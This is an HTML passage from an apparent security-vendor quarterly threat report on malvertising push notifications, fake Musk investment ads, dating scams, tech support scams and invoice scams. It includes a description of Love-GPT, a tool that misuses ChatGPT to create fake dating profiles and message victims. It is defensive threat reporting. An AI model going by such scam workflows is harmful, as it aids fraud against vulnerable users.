  5882. <figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="595" src="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/image046-1024x595.png" alt="" class="wp-image-7826" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/image046-1024x595.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/image046-300x174.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/image046-768x447.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/image046.png 1259w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>Various pop-ups leading to the same scam</em></figcaption></figure></div>
  5883.  
  5884. <div class="wp-block-image">
  5885. <figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="592" src="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/image048-1024x592.png" alt="" class="wp-image-7827" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/image048-1024x592.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/image048-300x173.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/image048-768x444.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/image048.png 1214w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>A fake alert landing page with push notification pop-ups as an example</em></figcaption></figure></div>
  5886.  
  5887.  
  5888. <p>We have warned about malicious push notifications already in previous reports; this quarter is no exception. This method continues to remain popular with scammers as its effectiveness is still considerable, especially on mobile phones.&nbsp;</p>
  5889.  
  5890.  
  5891.  
  5892. <p>As you can see in the below chart, the holiday season has ended not just for students but also for threat actors as there is a substantial surge in the volume of threat detections during September. The graph below represents detection of several types of malvertising. Within the month of September, we observed two prominent spikes in malvertising activity.</p>
  5893.  
  5894.  
  5895. <div class="wp-block-image">
  5896. <figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="404" src="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/05_Malvertising_daily_hiits-1024x404.png" alt="" class="wp-image-7865" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/05_Malvertising_daily_hiits-1024x404.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/05_Malvertising_daily_hiits-300x118.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/05_Malvertising_daily_hiits-768x303.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/05_Malvertising_daily_hiits-1536x606.png 1536w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/05_Malvertising_daily_hiits-2048x808.png 2048w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>Graph illustrating a notable upswing in malvertising activity in Q3/2023</em></figcaption></figure></div>
  5897.  
  5898.  
  5899. <p>One of the most common examples of this malvertising was a page in the push notification category that often appeared as part of a redirect chain. The page has multiple variations, but its main purpose is simply to convince the user to allow push notifications.</p>
  5900.  
  5901.  
  5902. <div class="wp-block-image">
  5903. <figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="526" src="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/06_Malvertising_puish_notifications_example-1024x526.png" alt="" class="wp-image-7864" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/06_Malvertising_puish_notifications_example-1024x526.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/06_Malvertising_puish_notifications_example-300x154.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/06_Malvertising_puish_notifications_example-768x394.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/06_Malvertising_puish_notifications_example.png 1516w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>An instance of a website persuading users to grant permission for push notifications</em>.</figcaption></figure></div>
  5904.  
  5905.  
  5906. <p>Push notifications can be especially effective on mobile devices, where they can also be disguised as system notifications, such as an unanswered call or a new text message.</p>
  5907.  
  5908.  
  5909. <div class="wp-block-image">
  5910. <figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="408" src="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/07_Malvertising_puish_notifications_campaign-1024x408.png" alt="" class="wp-image-7863" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/07_Malvertising_puish_notifications_campaign-1024x408.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/07_Malvertising_puish_notifications_campaign-300x119.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/07_Malvertising_puish_notifications_campaign-768x306.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/07_Malvertising_puish_notifications_campaign.png 1308w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>Example of a scam campaign using push notifications</em></figcaption></figure></div>
  5911.  
  5912.  
  5913. <p>Push notifications are not the only powerful tool for scammers. We have reported many times that scammers like to use advertising space on popular social networks. This way of promotion is especially dangerous because many users consider their social platforms to be a safe and personal space. Scammers also design their ads to attract attention, often by using catchy text or the faces of famous personalities. Thanks to this, the success rate of these campaigns is quite high.&nbsp;</p>
  5914.  
  5915.  
  5916.  
  5917. <p>Another big advantage for scammers utilising social media ads is their ability to precisely target and tailor content to vulnerable users. Consequently, users may find their social media feeds full of these types of ads over time.</p>
  5918.  
  5919.  
  5920. <div class="wp-block-image">
  5921. <figure class="aligncenter size-full"><img loading="lazy" decoding="async" width="721" height="835" src="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/08_Musk_1.png" alt="" class="wp-image-7862" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/08_Musk_1.png 721w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/08_Musk_1-259x300.png 259w" sizes="(max-width: 721px) 100vw, 721px" /><figcaption class="wp-element-caption"><em>One adware example leading to a financial scam, which was seen in multiple languages</em>.</figcaption></figure></div>
  5922.  
  5923. <div class="wp-block-image">
  5924. <figure class="aligncenter size-full"><img loading="lazy" decoding="async" width="661" height="537" src="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/09_Musk_2.png" alt="" class="wp-image-7861" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/09_Musk_2.png 661w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/09_Musk_2-300x244.png 300w" sizes="(max-width: 661px) 100vw, 661px" /><figcaption class="wp-element-caption"><em>Some scam ads are also found in video form</em></figcaption></figure></div>
  5925.  
  5926.  
  5927. <p>The ad examples above are from Facebook. These ads are part of a single fraudulent financial scam in which scammers try to trick users into investing in an Elon Musk/Tesla project. After clicking on the ad, the user is redirected to a web page that describes the great benefits of the project and assures them that it is certain to be profitable.</p>
  5928.  
  5929.  
  5930. <div class="wp-block-image">
  5931. <figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="675" src="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/10_Musk_3-1024x675.png" alt="" class="wp-image-7859" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/10_Musk_3-1024x675.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/10_Musk_3-300x198.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/10_Musk_3-768x506.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/10_Musk_3.png 1359w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>Landing page supporting claims from social media advertising</em></figcaption></figure></div>
  5932.  
  5933.  
  5934. <p>The aim of the scammers in this example is to give an impression of professionalism. Part of the scam is also the unrealistic promise of an &#8216;automatic robot&#8217; that invests by itself and &#8216;automatically&#8217; earns money.</p>
  5935.  
  5936.  
  5937. <div class="wp-block-image">
  5938. <figure class="aligncenter size-full"><img loading="lazy" decoding="async" width="829" height="1296" src="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/11_Musk_4-e1700042996669.png" alt="" class="wp-image-7858" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/11_Musk_4-e1700042996669.png 829w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/11_Musk_4-e1700042996669-192x300.png 192w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/11_Musk_4-e1700042996669-655x1024.png 655w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/11_Musk_4-e1700042996669-768x1201.png 768w" sizes="(max-width: 829px) 100vw, 829px" /><figcaption class="wp-element-caption"><em>Fake BBC News article ad</em></figcaption></figure></div>
  5939.  
  5940.  
  5941. <p>These fake sites take many forms. Often there are variations that mimic world-famous media outlets such as BBC News and many others. The ads take advantage of the targeting that social platforms allow: they click through to websites created for users in individual countries, mimicking the popular news sites of those countries.</p>
  5942.  
  5943.  
  5944.  
  5945. <p>The landing pages in this campaign also contain a registration form that requires users to enter their contact information. This information is sent to the scammer, who then contacts the user by email or, more often, by phone. The actual scamming effort is then carried out over the phone.</p>
  5946.  
  5947.  
  5948. <div class="wp-block-image">
  5949. <figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="681" src="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/12_Musk_5-1024x681.png" alt="" class="wp-image-7860" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/12_Musk_5-1024x681.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/12_Musk_5-300x200.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/12_Musk_5-768x511.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/12_Musk_5.png 1261w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>Example registration form</em></figcaption></figure></div>
  5950.  
  5951.  
  5952. <p>After filling out these fraudulent forms, the user can expect a phone call from the fraudsters. The caller subjects the prospective buyer to a thorough questioning, giving the impression that the financial company is checking not only the solvency of the prospective buyer but also their professional and financial knowledge level. The prospective client is then persuaded to install a remote computer access application, in this case, usually AnyDesk.&nbsp;</p>
  5953.  
  5954.  
  5955.  
  5956. <p>To help avoid such scams, we strongly advise the following:&nbsp;</p>
  5957.  
  5958.  
  5959.  
  5960. <ul>
  5961. <li>do not disclose your personal information to people you do not know or cannot authenticate&nbsp;</li>
  5962.  
  5963.  
  5964.  
  5965. <li>do not send photocopied personal documents&nbsp;</li>
  5966.  
  5967.  
  5968.  
  5969. <li>do not send any printed credit card information&nbsp;</li>
  5970.  
  5971.  
  5972.  
  5973. <li>do not give a code that would allow someone to access your computer remotely&nbsp;</li>
  5974.  
  5975.  
  5976.  
  5977. <li>if someone is remotely connected to your computer for any reason, do not log into your online banking&nbsp;</li>
  5978.  
  5979.  
  5980.  
  5981. <li>do not forward or tell anyone SMS bank authorization codes&nbsp;</li>
  5982.  
  5983.  
  5984.  
  5985. <li>do not authorize a payment to a stranger&nbsp;</li>
  5986.  
  5987.  
  5988.  
  5989. <li>keep an antivirus program installed on your computer&nbsp;</li>
  5990.  
  5991.  
  5992.  
  5993. <li>keep your online banking limits as low as possible and raise them only when you actually need to make a specific payment&nbsp;</li>
  5994. </ul>
  5995.  
  5996.  
  5997.  
  5998. <h3 class="wp-block-heading">Dating Scams&nbsp;</h3>
  5999.  
  6000.  
  6001.  
  6002. <p><em>Dating scams, also known as romance scams or online dating scams, involve fraudsters deceiving individuals into fake romantic relationships. Scammers adopt fake online identities to gain the victim&#8217;s trust, with the goal of obtaining money or enough personal information to commit identity theft.</em>&nbsp;</p>
  6003.  
  6004.  
  6005.  
  6006. <p>Dating scams have garnered increased attention from malicious actors due to the ever-growing popularity of online dating platforms. The accessibility and usual anonymity of these websites make them fertile ground for scammers seeking to exploit people&#8217;s emotions and vulnerabilities. Bad actors create fake profiles and engage in emotional manipulation, gaining the trust of unsuspecting users before exploiting them financially or emotionally. As people turn to online dating in greater numbers, scammers see a larger pool of potential victims, which encourages them to invest more time and effort into these deceptive schemes.&nbsp;</p>
  6007.  
  6008.  
  6009.  
  6010. <p>We observed a significant increase in dating scams during Q3/2023. The risk ratio of becoming a target rose by 34%.</p>
  6011.  
  6012.  
  6013. <div class="wp-block-image">
  6014. <figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="404" src="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/1_daily_hits_normalized_2023_Q3-DatingScam-Q3_malware_scam_DatingScam_31_2023-07-01—2023-09-30-1024x404.png" alt="" class="wp-image-7828" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/1_daily_hits_normalized_2023_Q3-DatingScam-Q3_malware_scam_DatingScam_31_2023-07-01—2023-09-30-1024x404.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/1_daily_hits_normalized_2023_Q3-DatingScam-Q3_malware_scam_DatingScam_31_2023-07-01—2023-09-30-300x118.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/1_daily_hits_normalized_2023_Q3-DatingScam-Q3_malware_scam_DatingScam_31_2023-07-01—2023-09-30-768x303.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/1_daily_hits_normalized_2023_Q3-DatingScam-Q3_malware_scam_DatingScam_31_2023-07-01—2023-09-30-1536x606.png 1536w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/1_daily_hits_normalized_2023_Q3-DatingScam-Q3_malware_scam_DatingScam_31_2023-07-01—2023-09-30-2048x808.png 2048w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>Global risk ratio in Avast’s user base regarding dating scams in Q3/2023</em></figcaption></figure></div>
  6015.  
  6016.  
  6017. <p>Dating scams are not confined to specific regions, but they do tend to be more prevalent in certain countries, such as those in Europe, the United States, Canada, and Australia. This can be attributed to a higher proportion of the population engaging in online dating, driven by greater internet accessibility and smartphone usage.</p>
  6018.  
  6019.  
  6020.  
  6021. <p>As illustrated by the heat map below, the highest risk ratio of encountering a dating scam is in Belgium (4.97%), Luxembourg (4.86%), Germany (4.76%), Slovakia (4.74%), and Austria (4.66%). In Canada, the risk ratio is 2.74%, closely followed by the United States with a risk ratio of 2.17%. For Australia, the risk ratio is 2.33%.</p>
  6022.  
  6023.  
  6024. <div class="wp-block-image">
  6025. <figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="639" src="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/2_map_2023_Q3-DatingScam-Q3_malware_scam_DatingScam_31_2023-07-01—2023-09-30-1024x639.png" alt="" class="wp-image-7829" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/2_map_2023_Q3-DatingScam-Q3_malware_scam_DatingScam_31_2023-07-01—2023-09-30-1024x639.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/2_map_2023_Q3-DatingScam-Q3_malware_scam_DatingScam_31_2023-07-01—2023-09-30-300x187.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/2_map_2023_Q3-DatingScam-Q3_malware_scam_DatingScam_31_2023-07-01—2023-09-30-768x479.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/2_map_2023_Q3-DatingScam-Q3_malware_scam_DatingScam_31_2023-07-01—2023-09-30-1536x958.png 1536w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/2_map_2023_Q3-DatingScam-Q3_malware_scam_DatingScam_31_2023-07-01—2023-09-30-2048x1278.png 2048w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>Map showing global risk ratio for dating scams in Q3/2023</em></figcaption></figure></div>
  6026.  
  6027.  
  6028. <h4 class="wp-block-heading">Love-GPT&nbsp;</h4>
  6029.  
  6030.  
  6031.  
  6032. <p>We have discovered a tool, which we call <a href="https://decoded.avast.io/threatintel/lovegpt-how-single-ladies-looking-for-your-data-upped-their-game-with-chatgpt/" target="_blank" rel="noreferrer noopener">Love-GPT</a>, that offers vast functionality across several different dating platforms: creating fake accounts, interacting with victims, bypassing CAPTCHA, anonymizing access using proxies and browser anonymization tools, and more. The author is also experimenting with ChatGPT, the now-famous text-based generative AI, to produce more streamlined and believable texts, which is why we named the tool Love-GPT. We have identified 13 different dating and social discovery platforms that the tool interacts with:</p>
  6033.  
  6034.  
  6035.  
  6036. <ul>
  6037. <li>Ashley Madison&nbsp;&nbsp;</li>
  6038.  
  6039.  
  6040.  
  6041. <li>Badoo&nbsp;&nbsp;</li>
  6042.  
  6043.  
  6044.  
  6045. <li>Bumble&nbsp;&nbsp;</li>
  6046.  
  6047.  
  6048.  
  6049. <li>Craigslist&nbsp;&nbsp;</li>
  6050.  
  6051.  
  6052.  
  6053. <li>DuyenSo&nbsp;&nbsp;</li>
  6054.  
  6055.  
  6056.  
  6057. <li>Facebook Dating&nbsp;&nbsp;</li>
  6058.  
  6059.  
  6060.  
  6061. <li>likeyou.vn&nbsp;&nbsp;</li>
  6062.  
  6063.  
  6064.  
  6065. <li>MeetMe&nbsp;&nbsp;</li>
  6066.  
  6067.  
  6068.  
  6069. <li>OkCupid&nbsp;&nbsp;</li>
  6070.  
  6071.  
  6072.  
  6073. <li>Plenty of Fish (POF)</li>
  6074.  
  6075.  
  6076.  
  6077. <li>Tagged&nbsp;&nbsp;</li>
  6078.  
  6079.  
  6080.  
  6081. <li>Tinder&nbsp;&nbsp;</li>
  6082.  
  6083.  
  6084.  
  6085. <li>Zoosk&nbsp;</li>
  6086. </ul>
  6087.  
  6088.  
  6089.  
  6090. <p>The tool uses the ChatGPT API in an attempt to streamline its texts. Overall, the tool contains the following functionalities leveraging ChatGPT (both finished and under development):</p>
  6091.  
  6092.  
  6093.  
  6094. <ul>
  6095. <li>Create a fake profile description to be used on the dating platforms&nbsp;</li>
  6096.  
  6097.  
  6098.  
  6099. <li>Read the inbox on the dating platform and reply to messages&nbsp;&nbsp;</li>
  6100.  
  6101.  
  6102.  
  6103. <li>Ask for a phone number&nbsp;&nbsp;</li>
  6104.  
  6105.  
  6106.  
  6107. <li>Write a first contact message&nbsp;&nbsp;</li>
  6108.  
  6109.  
  6110.  
  6111. <li>Chat from a template&nbsp;</li>
  6112. </ul>
  6113.  
  6114.  
  6115.  
  6116. <p>The tool sets the “prompt” value in the body of its API requests to generate output with ChatGPT. In some cases, the whole conversation context is provided to guide ChatGPT towards more precise results:</p>
  6117.  
  6118.  
  6119.  
  6120. <figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="115" src="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/3_prompt-1024x115.png" alt="" class="wp-image-7830" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/3_prompt-1024x115.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/3_prompt-300x34.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/3_prompt-768x87.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/3_prompt.png 1234w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>
  6121.  
  6122.  
  6123.  
  6124. <p>Just for the sake of demonstration, this is what ChatGPT usually returns for similar prompts:&nbsp;</p>
  6125.  
  6126.  
  6127.  
  6128. <figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="825" height="278" src="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/4_test_prompt.png" alt="" class="wp-image-7831" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/4_test_prompt.png 825w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/4_test_prompt-300x101.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/4_test_prompt-768x259.png 768w" sizes="(max-width: 825px) 100vw, 825px" /></figure>
  6129.  
  6130.  
  6131.  
  6132. <p>This functionality provides an interesting insight into the upcoming trend of highly believable texts produced with generative AI and large language models (LLMs). We can already see tools misusing generative AI platforms emerging, and this is likely one of the first in-the-wild examples of how bad actors can misuse them.</p>
  6133.  
  6134.  
  6135.  
  6136. <p>Love-GPT is written in VB6 and contains many control panels for its operations. In total, the tool contains 58 different application forms. One such form, essential for the whole toolset, is shown below; it is called Account Control Center.</p>
  6137.  
  6138.  
  6139. <div class="wp-block-image">
  6140. <figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="509" src="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/5_account_control_center-1024x509.png" alt="" class="wp-image-7832" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/5_account_control_center-1024x509.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/5_account_control_center-300x149.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/5_account_control_center-768x382.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/5_account_control_center-1536x764.png 1536w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/5_account_control_center-2048x1019.png 2048w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>Account Control Center with a built-in browser</em></figcaption></figure></div>
  6141.  
  6142.  
  6143. <p>With this arsenal, Love-GPT stays under the radar because no one can effectively distinguish connections coming from this specific tool from those of regular users accessing the platforms. If you are interested in more technical details, check out our detailed analysis on <a href="https://decoded.avast.io/threatintel/lovegpt-how-single-ladies-looking-for-your-data-upped-their-game-with-chatgpt/" target="_blank" rel="noreferrer noopener">Decoded</a>.</p>
  6144.  
  6145.  
  6146.  
  6147. <h3 class="wp-block-heading">Tech Support Scams&nbsp;</h3>
  6148.  
  6149.  
  6150.  
  6151. <p><em>Tech support scam threats involve fraudsters posing as legitimate technical support representatives who attempt to gain remote access to victims&#8217; devices or obtain sensitive personal information, such as credit card or banking details. These scams rely on confidence tricks to gain victims&#8217; trust and often involve convincing them to pay for unnecessary services or purchase expensive gift cards. It is important for internet users to be vigilant and to verify the credentials of anyone claiming to offer technical support services.</em>&nbsp;</p>
  6152.  
  6153.  
  6154.  
  6155. <p>The graph below shows no change in direction for Q3: the downward trend from Q2 continued into the following quarter.</p>
  6156.  
  6157.  
  6158. <div class="wp-block-image">
  6159. <figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="404" src="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/18_TSS_daily_hits-1024x404.png" alt="" class="wp-image-7868" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/18_TSS_daily_hits-1024x404.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/18_TSS_daily_hits-300x118.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/18_TSS_daily_hits-768x303.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/18_TSS_daily_hits-1536x606.png 1536w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/18_TSS_daily_hits-2048x808.png 2048w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>Graph illustrating a decline from the beginning of the year</em></figcaption></figure></div>
  6160.  
  6161.  
  6162. <p>Despite the overall downward trend, a notable shift has been observed in the detection ratios among different countries. Compared to the previous quarter, the countries with the highest risk ratio have changed: Japan was surpassed by Germany and came in second, while Canada saw a big drop and was surpassed by both the US and Switzerland.</p>
  6163.  
  6164.  
  6165.  
  6166. <figure class="wp-block-table aligncenter"><table><tbody><tr><td><strong>Country</strong>&nbsp;</td><td class="has-text-align-center" data-align="center"><strong>Risk ratio</strong>&nbsp;</td></tr><tr><td><strong>Germany</strong>&nbsp;</td><td class="has-text-align-center" data-align="center">1.81%&nbsp;</td></tr><tr><td><strong>Japan</strong>&nbsp;</td><td class="has-text-align-center" data-align="center">1.37%&nbsp;</td></tr><tr><td><strong>United States</strong>&nbsp;</td><td class="has-text-align-center" data-align="center">1.33%&nbsp;</td></tr><tr><td><strong>Switzerland</strong>&nbsp;</td><td class="has-text-align-center" data-align="center">1.19%&nbsp;</td></tr><tr><td><strong>Canada</strong>&nbsp;</td><td class="has-text-align-center" data-align="center">0.99%&nbsp;</td></tr></tbody></table></figure>
  6167.  
  6168.  
  6169.  
  6170. <p>Even though we have seen a decline for this threat since the beginning of the year, the tech support scam still remains a global threat, and a very effective one, especially against inexperienced users.</p>
  6171.  
  6172.  
  6173. <div class="wp-block-image">
  6174. <figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="639" src="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/19_TSS_heatmap-1024x639.png" alt="" class="wp-image-7869" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/19_TSS_heatmap-1024x639.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/19_TSS_heatmap-300x187.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/19_TSS_heatmap-768x479.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/19_TSS_heatmap-1536x958.png 1536w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/19_TSS_heatmap-2048x1278.png 2048w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>Heatmap showing risk-ratio for Q3/2023</em></figcaption></figure></div>
  6175.  
  6176.  
  6177. <p>For all the years we have been monitoring tech support scams, the design of the site has barely changed. The main goal is to block the browser in such a way that the user is motivated to pick up the phone and call the provided phone number.&nbsp;</p>
  6178.  
  6179.  
  6180.  
  6181. <p>In the following example, you can see the German variant. Germany also had the highest risk ratio in the third quarter despite the overall decline.</p>
  6182.  
  6183.  
  6184. <div class="wp-block-image">
  6185. <figure class="aligncenter size-full"><img loading="lazy" decoding="async" width="720" height="521" src="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/01-tech-support-website.gif" alt="" class="wp-image-7842"/><figcaption class="wp-element-caption"><em>The German variant of the most prevalent version of the TSS landing page</em></figcaption></figure></div>
  6186.  
  6187.  
  6188. <p>The appearance of the pages is not the only clearly recognizable sign; the composition of the URLs used by these scams is no less telling. It is often possible to recognize the type of campaign and its focus from the URL alone. Sometimes the URLs even contain scam phone numbers, as seen in the following illustration.</p>
  6189.  
  6190.  
  6191. <div class="wp-block-image">
  6192. <figure class="aligncenter size-full"><img loading="lazy" decoding="async" width="729" height="155" src="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/21_TSS_URLs.png" alt="" class="wp-image-7870" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/21_TSS_URLs.png 729w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/21_TSS_URLs-300x64.png 300w" sizes="(max-width: 729px) 100vw, 729px" /><figcaption class="wp-element-caption"><em>An example of URLs from a prevalent campaign containing scammer phone numbers</em></figcaption></figure></div>
  6193.  
  6194.  
  6195. <h3 class="wp-block-heading">Refund and Invoice Scams&nbsp;</h3>
  6196.  
  6197.  
  6198.  
  6199. <p><em>Invoice scams involve fraudsters sending false bills or invoices for goods or services that were never ordered or received. Scammers rely on invoices looking legitimate, often using company logos or other branding to trick unsuspecting victims into making payments. These scams can be especially effective when targeted at businesses, as employees may assume that a colleague made the purchase or simply overlook the details of the invoice. It is important to carefully review all invoices and bills before making any payments and to verify the legitimacy of the sender if there are any suspicions of fraud.</em>&nbsp;</p>
  6200.  
  6201.  
  6202.  
  6203. <p>In Australia, the past quarter has been an exception to the otherwise consistent trend, with a significant spike and sudden rise in email-targeted scams. Notably, the rise in protected customers in Australia surpassed even that in the US, which is traditionally at the top of the list. The number of threats we monitored in other regions mainly stayed at very similar numbers compared to previous quarters.</p>
  6204.  
  6205.  
  6206. <div class="wp-block-image">
  6207. <figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="639" src="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/22_Refund_scam_heatmap-1024x639.png" alt="" class="wp-image-7871" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/22_Refund_scam_heatmap-1024x639.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/22_Refund_scam_heatmap-300x187.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/22_Refund_scam_heatmap-768x479.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/22_Refund_scam_heatmap-1536x958.png 1536w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/22_Refund_scam_heatmap-2048x1278.png 2048w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>Refund and Invoice Scam risk ratio in Q3/2023</em></figcaption></figure></div>
  6208.  
  6209.  
  6210. <p>The highest uptick we observed was primarily due to the rise in Australia. Additionally, we noticed that smaller peaks usually occur at the beginning of the working week. This is when people generally sift through their mailboxes, and their vigilance may be lowered because of the larger volume of data they have to process. Therefore, one takeaway is that it definitely helps to take your time and sift through your emails in a peaceful manner, as rushing may increase the chance of falling victim to a scam.&nbsp;</p>
  6211.  
  6212.  
  6213. <div class="wp-block-image">
